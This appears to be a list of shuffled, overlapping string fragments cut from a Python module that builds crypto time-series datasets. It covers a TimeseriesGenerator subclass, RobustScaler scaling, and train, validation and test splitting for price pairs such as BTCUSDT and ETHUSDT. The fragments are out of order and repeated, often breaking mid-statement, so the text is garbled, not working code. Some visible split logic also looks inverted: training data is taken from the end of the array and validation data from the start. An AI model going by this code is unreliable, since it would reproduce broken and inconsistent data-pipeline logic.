"- self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets",
"self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape",
"len(targets): raise ValueError('Data and targets have to be' + ' of same length.",
"raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the sequence",
"class DSCreator: \"\"\" Class for dataset creation for dataset configuration we are using",
"__init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data,",
"from this datetimeindex end_period = None -> Use until [:-1] of historical data",
"len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size",
"self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape",
"def calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride *",
"= self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr,",
"def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"= y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:,",
"to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05",
"None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test = None",
"is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator:",
"self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows *",
"msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp =",
"dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and timeframes). All data",
"+ self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size *",
"x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def",
"= self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val,",
"def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone",
"end_index=%i` ' 'is disallowed, as no part of the sequence ' 'would be",
"samples, targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile =",
"for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples,",
"(self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset",
"self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name",
"sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot",
"Use timeframes from this list to load start_period = None -> Use from",
"using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting",
"+ self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len,",
"if len(data) != len(targets): raise ValueError('Data and targets have to be' + '",
"samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index",
"# x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid",
"= batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i`",
"None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test = None",
"self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df",
"= f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride = stride",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self):",
"x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid data",
"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len,",
"self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else:",
"= self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def",
"= RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr =",
"is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None)",
"import time import copy import pytz import numpy as np import datetime import",
"self.y_df = None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val",
"= self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation type\"",
":] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using",
"solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train",
"= self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif",
"time_intervals = ['15m'] -> Use timeframes from this list to load start_period =",
"[0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex",
"overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0:",
"y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator",
"object with OHLCV data (symbols and timeframes). All data with chosen period loaded",
"- test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to",
"x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes,",
"get_test(self): if (self.x_Test is not None) and (self.y_Test is not None): return self.x_Test,",
"df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df =",
"- self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row]",
"return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0,",
"0: start_index += overlap self.data = data self.targets = targets self.length = length",
"* self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :]",
"seaborn as sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)",
"shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size)",
"targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str = ''",
"self.input_shape = None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train",
"self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train is not",
"self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self)",
"> self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of",
"pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\") -> Use only this pairs to load time_intervals =",
"length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >=",
"None self.val_gen = None self.test_gen = None self.input_shape = None pass def get_train(self):",
"= length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length",
"start_period = None -> Use from [0:] of historical data start_period = '2021-09-01",
"from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from",
"self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train",
"'is disallowed, as no part of the sequence ' 'would be left to",
"self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows",
"in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows])",
"= None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test =",
"self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if",
"type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr)",
"gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == \"__main__\":",
"in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape",
"= self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def",
"targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...],",
"y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time",
"/ 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return",
"self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation",
"def get_train(self): if (self.x_Train is not None) and (self.y_Train is not None): return",
"preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr,",
"(with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to load",
"['15m'] -> Use timeframes from this list to load start_period = None ->",
"is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self):",
":] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data =",
"DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in timeframe directory",
"data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets,",
"self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\":",
"if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self,",
"None self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train is",
"return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen:",
"\"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr",
"\"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight =",
"= (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint(",
"if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no",
"rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index +",
"= DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0]",
"import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as",
"dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with",
"end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls = dsc.create_dataset()",
"of the sequence ' 'would be left to be used as current step.'",
"Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler",
"- test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len +",
"+ self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes,",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler",
"row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in",
"class ------------------------ pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol",
"time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg",
"self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def",
"x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data",
"self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"\"\"\" Getting object with OHLCV data (symbols and timeframes). All data with chosen",
"x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset",
"self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return",
"def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows",
"(self.x_Test is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class",
"self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = \"Error: Unknown dataset preparation",
"self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test",
"directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile",
"y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len +",
"type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\":",
"self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr",
"as np import datetime import pandas as pd from typing import Tuple from",
"+ self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :]",
"as tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import",
"test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have",
"stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index,",
"create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if",
"= int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df =",
"self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data,",
"to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass",
"create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg",
":] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :]",
"+ val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :]",
"Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features =",
"self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len =",
"generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data)",
"sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing",
"for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],)",
"\"\"\" Class for dataset creation for dataset configuration we are using DSConstants dataclass",
"self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power()",
"= object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen =",
"return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index +",
"== \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight",
"to load start_period = None -> Use from [0:] of historical data start_period",
"end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse,",
"self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else:",
"import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import",
"__init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df =",
"used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self):",
"self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data,",
"y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"* index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1),",
"index = 0 i = (self.start_index + self.batch_size * self.stride * index) rows",
") return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"\"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df =",
"= \"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1,",
"sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing",
":] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data",
"- 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size =",
"!= len(targets): raise ValueError('Data and targets have to be' + ' of same",
"TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data,",
"= np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if",
"= reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise",
":] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data =",
"from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from",
"(self.x_Train is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def",
"/ 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f\"{offset_hour:.0f}\" if offset_hour",
"\"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler",
"= None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val =",
"preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr,",
"time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals",
"length={length}` is disallowed') if overlap > 0: start_index += overlap self.data = data",
"to load time_intervals = None -> Use all timeframes directories for loading (with",
"self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration we",
"self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if",
"from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from this",
"length self.overlap = overlap if end_index is None: end_index = len(data) - 1",
"(samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index,",
"-> Use this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'],",
"= sampling_rate self.stride = stride self.start_index = start_index + length self.overlap = overlap",
"current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index =",
"return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for dataset configuration",
"self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data",
"\"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs",
"end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have",
"self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) #",
"= DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == \"close1-close2\": self.dataset.y_df",
":] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data =",
"= None -> Use all pairs in timeframe directory pairs_symbol = (\"BTCUSDT\", \"ETHUSDT\")",
"# self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse:",
"' 'would be left to be used as current step.' % (self.start_index, self.end_index))",
"= self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df",
"= None -> Use from [0:] of historical data start_period = '2021-09-01 00:00:00'",
"DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data ==",
"dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__",
"23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search",
":] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes",
"None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test",
"+ self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:,",
"\"Error: Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1)",
"\"\"\" Using generator 1 time to have solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test =",
"copy import pytz import numpy as np import datetime import pandas as pd",
"start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len",
"Unknown dataset preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if",
"------------------------ pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol =",
"sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen =",
"y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0]",
"until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until this",
"= RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\"",
"df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df",
"the sequence ' 'would be left to be used as current step.' %",
